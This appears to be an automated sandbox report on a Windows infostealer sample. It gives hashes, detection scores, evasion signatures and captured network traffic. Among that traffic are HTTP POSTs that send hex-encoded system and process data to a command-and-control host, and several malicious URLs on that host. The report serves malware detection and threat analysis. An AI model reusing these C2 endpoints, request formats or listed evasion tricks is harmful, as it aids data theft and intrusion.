
Windows Analysis Report
Bo6uO5gKL4.exe

Overview

General Information

Sample name: Bo6uO5gKL4.exe (renamed because original name is a hash value)
Original sample name: 935d1fe58326c50f930c94e3493b266c.exe
Analysis ID: 1582826
MD5: 935d1fe58326c50f930c94e3493b266c
SHA1: cd649b9eaae16dc9457c388970427710e485eb9c
SHA256: ad2f45143de4a73f40010ac03e0aff210dcf24dfc8b0fffba678c3e9f20d5e22
Tags: exe, user-abuse_ch

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Multi AV Scanner detection for submitted file
AI detected suspicious sample
Hides threads from debuggers
Infostealer behavior detected
Leaks process information
Machine Learning detection for sample
PE file contains section with special chars
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create an SMB header
Detected potential crypto function
Entry point lies outside standard sections
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • Bo6uO5gKL4.exe (PID: 7132 cmdline: "C:\Users\user\Desktop\Bo6uO5gKL4.exe" MD5: 935D1FE58326C50F930C94E3493B266C)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Suricata rule has matched


AV Detection

Source: Bo6uO5gKL4.exe | Avira: detected
Source: http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738http://home.fortth14vs.top/gduZhxVRrNSTmMah | Avira URL Cloud: Label: malware
Source: http://home.fortth14vs.top/gduZ | Avira URL Cloud: Label: malware
Source: http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738?argument=0 | Avira URL Cloud: Label: malware
Source: http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738 | Avira URL Cloud: Label: malware
Source: http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb18 | Avira URL Cloud: Label: malware
Source: http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738?argument=0tsi | Avira URL Cloud: Label: malware
Source: http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb17355377386963 | Avira URL Cloud: Label: malware
Source: Bo6uO5gKL4.exe | ReversingLabs: Detection: 47%
Source: Bo6uO5gKL4.exe | Virustotal: Detection: 44%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: Bo6uO5gKL4.exe | Joe Sandbox ML: detected
Source: Bo6uO5gKL4.exe | Binary or memory string: -----BEGIN PUBLIC KEY-----
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe | Code function: mov dword ptr [ebp+04h], 424D53FFh (0_2_005EA5B0)
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe | Code function: mov dword ptr [ebx+04h], 424D53FFh (0_2_005EA7F0)
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe | Code function: mov dword ptr [edi+04h], 424D53FFh (0_2_005EA7F0)
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe | Code function: mov dword ptr [esi+04h], 424D53FFh (0_2_005EA7F0)
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe | Code function: mov dword ptr [edi+04h], 424D53FFh (0_2_005EA7F0)
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe | Code function: mov dword ptr [esi+04h], 424D53FFh (0_2_005EA7F0)
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe | Code function: mov dword ptr [ebx+04h], 424D53FFh (0_2_005EA7F0)
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe | Code function: mov dword ptr [ebx+04h], 424D53FFh (0_2_005EB560)
Source: Bo6uO5gKL4.exe | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe | Code function: 0_2_0058255D GetSystemInfo, GlobalMemoryStatusEx, GetDriveTypeA, GetDiskFreeSpaceExA, KiUserCallbackDispatcher, SHGetKnownFolderPath, FindFirstFileW, FindNextFileW, K32EnumProcesses
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe | Code function: 0_2_005829FF FindFirstFileA, RegOpenKeyExA, CharUpperA, CreateToolhelp32Snapshot, QueryFullProcessImageNameA, CloseHandle, CreateToolhelp32Snapshot, CloseHandle
Source: global traffic | HTTP traffic detected:
    GET /ip HTTP/1.1
    Host: httpbin.org
    Accept: */*
Source: global trafficHTTP traffic detected: POST /gduZhxVRrNSTmMahdBGb1735537738 HTTP/1.1Host: home.fortth14vs.topAccept: */*Content-Type: application/jsonContent-Length: 444098Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 38 34 38 35 39 30 39 31 33 37 32 30 36 38 30 35 31 37 32 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 32 36 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 69 73 74 72 79 22 2c 20 22 70 69 64 22 3a 20 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 6d 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 32 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 31 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 69 6e 69 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 38 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 39 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 6c 6f 67 6f 6e 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 65 72 76 69 63 65 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 33 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 
22 3a 20 22 6c 73 61 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 34 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 37 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 38 38 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 32 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 64 77 6d 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 33 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 37 36 20 7d 2c
Source: global traffic | HTTP traffic detected:
    GET /gduZhxVRrNSTmMahdBGb1735537738?argument=0 HTTP/1.1
    Host: home.fortth14vs.top
    Accept: */*
Source: global traffic | HTTP traffic detected:
    POST /gduZhxVRrNSTmMahdBGb1735537738 HTTP/1.1
    Host: home.fortth14vs.top
    Accept: */*
    Content-Type: application/json
    Content-Length: 31
    Data Raw: 7b 20 22 69 64 31 22 3a 20 22 30 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 31 22 20 7d
    Data Ascii: { "id1": "0", "data": "Done1" }
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe | Code function: 0_2_0064A8C0 recvfrom
Source: global traffic | HTTP traffic detected:
    GET /ip HTTP/1.1
    Host: httpbin.org
    Accept: */*
Source: global traffic | HTTP traffic detected:
    GET /gduZhxVRrNSTmMahdBGb1735537738?argument=0 HTTP/1.1
    Host: home.fortth14vs.top
    Accept: */*
Source: global traffic | DNS traffic detected: DNS query: httpbin.org
Source: global traffic | DNS traffic detected: DNS query: home.fortth14vs.top
Source: unknownHTTP traffic detected: POST /gduZhxVRrNSTmMahdBGb1735537738 HTTP/1.1Host: home.fortth14vs.topAccept: */*Content-Type: application/jsonContent-Length: 444098Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 38 34 38 35 39 30 39 31 33 37 32 30 36 38 30 35 31 37 32 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 32 36 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 69 73 74 72 79 22 2c 20 22 70 69 64 22 3a 20 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 6d 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 32 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 31 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 69 6e 69 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 38 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 39 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 6c 6f 67 6f 6e 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 65 72 76 69 63 65 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 33 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 
20 22 6c 73 61 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 34 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 37 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 38 38 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 32 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 64 77 6d 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 33 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 37 36 20 7d 2c
Source: global trafficHTTP traffic detected: HTTP/1.1 404 NOT FOUNDserver: nginx/1.22.1date: Tue, 31 Dec 2024 14:42:03 GMTcontent-type: text/html; charset=utf-8content-length: 207Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
Source: global trafficHTTP traffic detected: HTTP/1.1 404 NOT FOUNDserver: nginx/1.22.1date: Tue, 31 Dec 2024 14:42:05 GMTcontent-type: text/html; charset=utf-8content-length: 207Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
Source: Bo6uO5gKL4.exe, 00000000.00000003.1581992204.000000000761F000.00000004.00001000.00020000.00000000.sdmp, Bo6uO5gKL4.exe, 00000000.00000002.1674269432.0000000000B60000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: http://.css
Source: Bo6uO5gKL4.exe, 00000000.00000003.1581992204.000000000761F000.00000004.00001000.00020000.00000000.sdmp, Bo6uO5gKL4.exe, 00000000.00000002.1674269432.0000000000B60000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: http://.jpg
Source: Bo6uO5gKL4.exe, 00000000.00000003.1669640558.000000000187B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://home.fortth14vs.top/gduZ
Source: Bo6uO5gKL4.exe, 00000000.00000003.1670432119.0000000001849000.00000004.00000020.00020000.00000000.sdmp, Bo6uO5gKL4.exe, 00000000.00000002.1674269432.0000000000B60000.00000040.00000001.01000000.00000003.sdmp, Bo6uO5gKL4.exe, 00000000.00000002.1675408659.000000000184B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738
Source: Bo6uO5gKL4.exe, 00000000.00000002.1675408659.000000000184B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb17355377386963
Source: Bo6uO5gKL4.exe, 00000000.00000002.1675539767.0000000001856000.00000004.00000020.00020000.00000000.sdmp, Bo6uO5gKL4.exe, 00000000.00000003.1669640558.0000000001853000.00000004.00000020.00020000.00000000.sdmp, Bo6uO5gKL4.exe, 00000000.00000002.1675408659.000000000181E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738?argument=0
Source: Bo6uO5gKL4.exe, 00000000.00000002.1675408659.000000000181E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738?argument=0tsi
Source: Bo6uO5gKL4.exe, 00000000.00000002.1674269432.0000000000B60000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738http://home.fortth14vs.top/gduZhxVRrNSTmMah
Source: Bo6uO5gKL4.exe, 00000000.00000002.1674269432.0000000000B60000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb18
Source: Bo6uO5gKL4.exe, 00000000.00000003.1581992204.000000000761F000.00000004.00001000.00020000.00000000.sdmp, Bo6uO5gKL4.exe, 00000000.00000002.1674269432.0000000000B60000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: http://html4/loose.dtd
Source: Bo6uO5gKL4.exe, 00000000.00000002.1674269432.0000000000B60000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: https://curl.se/docs/alt-svc.html
Source: Bo6uO5gKL4.exe, 00000000.00000002.1674269432.0000000000B60000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: https://curl.se/docs/hsts.html
Source: Bo6uO5gKL4.exe | String found in binary or memory: https://curl.se/docs/hsts.html#
Source: Bo6uO5gKL4.exe, Bo6uO5gKL4.exe, 00000000.00000003.1581992204.000000000761F000.00000004.00001000.00020000.00000000.sdmp, Bo6uO5gKL4.exe, 00000000.00000002.1674269432.0000000000B60000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: https://curl.se/docs/http-cookies.html
Source: Bo6uO5gKL4.exe, 00000000.00000003.1581992204.000000000761F000.00000004.00001000.00020000.00000000.sdmp, Bo6uO5gKL4.exe, 00000000.00000002.1674269432.0000000000B60000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: https://httpbin.org/ip
Source: Bo6uO5gKL4.exe, 00000000.00000003.1581992204.000000000761F000.00000004.00001000.00020000.00000000.sdmp, Bo6uO5gKL4.exe, 00000000.00000002.1674269432.0000000000B60000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: https://httpbin.org/ipbefore
Source: unknown | Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49705

System Summary

Source: Bo6uO5gKL4.exe | Static PE information: section name:
Source: Bo6uO5gKL4.exe | Static PE information: section name: .idata
Source: Bo6uO5gKL4.exe | Static PE information: section name:
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe | Code function: 0_3_018BBD46
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe | Code function: 0_2_005905B0
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe | Code function: 0_2_00596FA0
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe | Code function: 0_2_005BF100
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe | Code function: 0_2_0064B180
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe | Code function: 0_2_006500E0
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe | Code function: 0_2_0090A000
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe | Code function: 0_2_0090E050
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe | Code function: 0_2_005E6210
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe | Code function: 0_2_0064C320
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe | Code function: 0_2_00650420
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe | Code function: 0_2_008D4410
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe | Code function: 0_2_0058E620
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe | Code function: 0_2_00904780
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe | Code function: 0_2_0064C770
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe | Code function: 0_2_005EA7F0
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe | Code function: 0_2_008E6730
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe | Code function: 0_2_00594940
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe | Code function: 0_2_0058A960
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe | Code function: 0_2_0063C900
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe | Code function: 0_2_0083AAC0
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe | Code function: 0_2_00756AC0
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe | Code function: 0_2_00714B60
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe | Code function: 0_2_008F8BF0
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe | Code function: 0_2_0083AB2C
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe | Code function: 0_2_0058CBB0
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe | Code function: 0_2_0090CC90
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe | Code function: 0_2_008FCD80
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe | Code function: 0_2_00904D40
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe | Code function: 0_2_00740D80
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe | Code function: 0_2_0089AE30
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe | Code function: 0_2_008D2F90
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe | Code function: 0_2_005A4F70
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe | Code function: 0_2_0064EF90
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe | Code function: 0_2_00648F90
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe | Code function: 0_2_005910E6
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe | Code function: 0_2_008ED430
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe | Code function: 0_2_008F35B0
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe | Code function: 0_2_009117A0
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe | Code function: String function: 005C50A0 appears 81 times
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe | Code function: String function: 005871E0 appears 40 times
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe | Code function: String function: 00737220 appears 91 times
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe | Code function: String function: 0058CAA0 appears 59 times
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe | Code function: String function: 0059CD40 appears 63 times
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe | Code function: String function: 0059CCD0 appears 54 times
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe | Code function: String function: 0075CBC0 appears 87 times
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe | Code function: String function: 005875A0 appears 552 times
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe | Code function: String function: 005C4F40 appears 278 times
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe | Code function: String function: 005873F0 appears 99 times
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe | Code function: String function: 005C4FD0 appears 206 times
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe | Code function: String function: 005C5340 appears 39 times
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe | Code function: String function: 006644A0 appears 56 times
Source: Bo6uO5gKL4.exe | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: Bo6uO5gKL4.exe | Static PE information: Section: nlrwmcpx ZLIB complexity 0.994404263920135
Source: Bo6uO5gKL4.exe | Static PE information: Entrypoint disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5, instruction diversity: 0.5
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@1/0@8/2
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe | Code function: 0_2_0058255D GetSystemInfo, GlobalMemoryStatusEx, GetDriveTypeA, GetDiskFreeSpaceExA, KiUserCallbackDispatcher, SHGetKnownFolderPath, FindFirstFileW, FindNextFileW, K32EnumProcesses
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe | Code function: 0_2_005829FF FindFirstFileA, RegOpenKeyExA, CharUpperA, CreateToolhelp32Snapshot, QueryFullProcessImageNameA, CloseHandle, CreateToolhelp32Snapshot, CloseHandle
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe | Mutant created: \Sessions\1\BaseNamedObjects\My_mutex
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: Bo6uO5gKL4.exe | ReversingLabs: Detection: 47%
Source: Bo6uO5gKL4.exe | Virustotal: Detection: 44%
Source: Bo6uO5gKL4.exe | String found in binary or memory: Unable to complete request for channel-process-startup
Source: Bo6uO5gKL4.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe | Section loaded: dhcpcsvc.dll
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe | Section loaded: napinsp.dll
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe | Section loaded: pnrpnsp.dll
